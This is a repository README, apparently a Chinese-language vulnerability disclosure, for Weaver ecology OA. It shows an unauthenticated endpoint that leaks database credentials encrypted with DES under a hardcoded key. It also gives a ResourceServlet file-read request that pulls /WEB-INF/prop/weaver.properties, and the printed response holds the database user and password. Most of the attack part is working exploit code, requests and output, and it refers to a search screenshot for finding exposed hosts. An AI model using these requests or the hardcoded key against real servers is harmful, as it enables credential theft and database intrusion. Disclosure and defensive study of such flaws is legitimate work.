├── Fortify.jpg ├── README.md ├── dbconfig.png └── fileread.png /Fortify.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/DBconfigReader/8654f58f49c75f051448977699adc85c0998594a/Fortify.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # 泛微ecology OA系统接口存在数据库配置信息泄露漏洞 3 | 4 | ## /mobile/DBconfigReader.jsp 5 | 6 | ` http://x.x.x.x:8090/mobile/DBconfigReader.jsp` 7 | 8 | ![](./dbconfig.png) 9 | 10 | ![](./fofa.png) 11 | 12 | ## Fortify 代码审计 检测出-弱加密算法 13 | ![](./Fortify.jpg) 14 | 15 | `SecretKey key = SecretKeyFactory.getInstance("DES").generateSecret(dks1);` 16 | 17 | ``` 18 | <%@ page language="java" contentType="text/html; charset=UTF-8"%> 19 | <%@ page import="weaver.file.Prop" %> 20 | <%@ page import="javax.crypto.spec.DESKeySpec" %> 21 | <%@ page import="javax.crypto.*" %> 22 | <% 23 | String conStr=Prop.getPropValue("weaver","ecology.url"); 24 | String conUser=Prop.getPropValue("weaver","ecology.user"); 25 | String conPsw=Prop.getPropValue("weaver","ecology.password"); 26 | String loginType=Prop.getPropValue("weaver","authentic"); 27 | // StringBuffer sb = new StringBuffer(); 28 | // sb.append("url="+conStr+","); 29 | // sb.append("user="+conUser+","); 30 | // sb.append("password="+conPsw); 31 | String sb="url="+conStr+",user="+conUser+",password="+conPsw+",logintype="+loginType; 32 | byte[] str = sb.getBytes(); 33 | String keyString = "1z2x3c4v5b6n"; 34 | byte[] keyByte = keyString.getBytes(); 35 | // 创建一个密匙工厂,然后用它把DESKeySpec对象转换成一个SecretKey对象 36 | DESKeySpec dks1 = new DESKeySpec(keyByte); 37 | SecretKey key = SecretKeyFactory.getInstance("DES").generateSecret(dks1); 38 | Cipher cipher = Cipher.getInstance("DES"); 39 | cipher.init(Cipher.ENCRYPT_MODE, key); 40 | byte[] cipherText = cipher.doFinal(str); 41 | //System.out.println(cipherText.length); 42 | ServletOutputStream sos = response.getOutputStream(); 43 | sos.write(cipherText); 44 | sos.flush(); 45 | sos.close(); 46 | %> 47 | ``` 48 | 49 | ## 文件读取漏洞 org.springframework.web.servlet.ResourceServlet 50 | ![](./fileread.png) 51 | 52 | https://docs.spring.io/spring/docs/3.0.x/javadoc-api/org/springframework/web/servlet/ResourceServlet.html 53 | 54 | 泛微-数据库配置文件:`/WEB-INF/prop/weaver.properties` 55 | 56 | ``` 57 | GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties HTTP/1.1 58 | Host: 127.0.0.1:8081 59 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 60 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 61 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 62 | Accept-Encoding: gzip, deflate 63 | Connection: close 64 | Upgrade-Insecure-Requests: 1 65 | 66 | 67 | ``` 68 | 69 | ``` 70 | HTTP/1.1 200 OK 71 | Server: Resin/3.1.8 72 | Cache-Control: private 73 | X-Frame-Options: SAMEORIGIN 74 | X-XSS-Protection: 1 75 | Set-Cookie: ecology_JSessionId=xxxxxx; path=/ 76 | Content-Length: 609 77 | Connection: close 78 | Date: Mon, 13 Jul 2020 08:13:13 GMT 79 | 80 | ecology.overtime=60 81 | DriverClasses = com.microsoft.jdbc.sqlserver.SQLServerDriver 82 | ecology.url=jdbc\:sqlserver\://127.0.0.1\:1433;DatabaseName\=ecology 83 | ecology.maxconn=300 84 | ecology.user=sa 85 | ecology.password=123456 86 | ecology.charset=ISO 87 | LOG_FORMAT=yyyy.MM.dd'-'hh\:mm\:ss 88 | ecology.isgoveproj=0 89 | DEBUG_MODE=false 90 | ``` 91 | -------------------------------------------------------------------------------- /dbconfig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/DBconfigReader/8654f58f49c75f051448977699adc85c0998594a/dbconfig.png -------------------------------------------------------------------------------- /fileread.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/DBconfigReader/8654f58f49c75f051448977699adc85c0998594a/fileread.png --------------------------------------------------------------------------------